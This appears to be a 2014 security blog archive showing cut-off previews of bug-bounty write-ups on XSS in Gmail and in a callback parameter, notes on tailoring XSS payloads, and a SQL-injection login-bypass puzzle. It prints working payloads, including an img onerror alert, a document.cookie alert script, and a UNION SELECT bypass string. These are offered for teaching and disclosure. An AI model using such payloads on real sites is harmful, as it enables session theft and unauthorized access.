Showing posts from April, 2014

Tailoring Custom Javascript Payloads for a successful XSS...

Hey Guys,

Today I would like to show you, how i was able to create custom XSS payloads based on existing javascripts in various websites.

Note that this write-up does not show you how to get XSS in various websites, but it covers various ways to create custom xss payloads.

The approach i follow to create a successful xss payload involves in 3 steps.

1. Analyse the native code
2. Construct the correct syntax
3. Execute the payload

For explanation purpose i considered GET based user input, however, this method will work on POST method also.

1. Analyse:
This stage involves the analysis of the web-page code in which we are creating a payload. It is important that the main limitation in this stage is that, the user input we entering should be returned in between script tags.
index.php?name=test  should return the payload as follows.

If the user input is not rendering in between <script> tags, then the following approach can not be…

How I Got My First Bounty.. " A Tale of GMAIL Stored XSS "

Hey Guys,

This bug i reported a longback and fixed now. Lets jump into the story.

In GMAIL settings general tab, there is an option for creating an automatic mail responder, in case if we go on a vacation and if we dont want to be disturbed. While going through gmail, like all the others, i also ignored that feature and tried here and there.
At the same time one of my goood friend @iampr3m was also testing Gmail and he was trying hard to find something in the same settings page. However that guy begin his testing from the top and testing in the Signature feature. So i started testing the settings page from bottom and i got lucky to have the vacation responder in the bottom of the page.
So, while testing, I observed that the vacation message is going in between a div tag. So as usual, i used a simple payload with img tag (  <img src=a onerror=alert(1)>  ) to test my luck. As soon as the payload entered with < and >, the server invalidated the input and stripped of the spec…

Simple Login Page Bypass..

Simple Login Page Bypass Using SQLi..

The following code is being used in a login check page.

Find the proper credentials for getting a successful authentication alert.

$result = mysql_query($sql);
if(mysql_num_rows($result) == 0){
echo "<script>alert('failed')</script>";
} else {
$res = mysql_fetch_array($result);
if($res[2]==$pwd&&((!$res[7])&&($res[3]))) {
echo "<script>alert('success');</script>";
} else {
echo "<script>alert('failed');</script>";


or find the answers here

username : ' UNION SELECT 'TEST','FOR','SQLI',1,'N','USER','NAME',0 -- -
password : SQLI

Cross Site Scripting through callback functionality

Hello Guys,
Today i would like to share a Cross Site Scripting Vulnerability that was existing in JSON/AJAX callback functionality. I found this vulnerability a few days back, but as the bug is fixed now, i'd like to share the story.
The vulnerability is existing in the forgot password functionality. The forgot password functionality uses an ajax based request/response mechanism within the login page. While testing the application, i observed that the application is using a callback function to render the response into the application.

This callback function name is being passed as a GET parameter. With a little analysis, i found that the callback parameter is vulnerable to Cross Site Scripting vulnerability. So i extracted the forget password request and crafted a GET based URL request with a simple XSS payload as the callback value.<script>alert(document.cookie)</script><!--+

So i submitted th…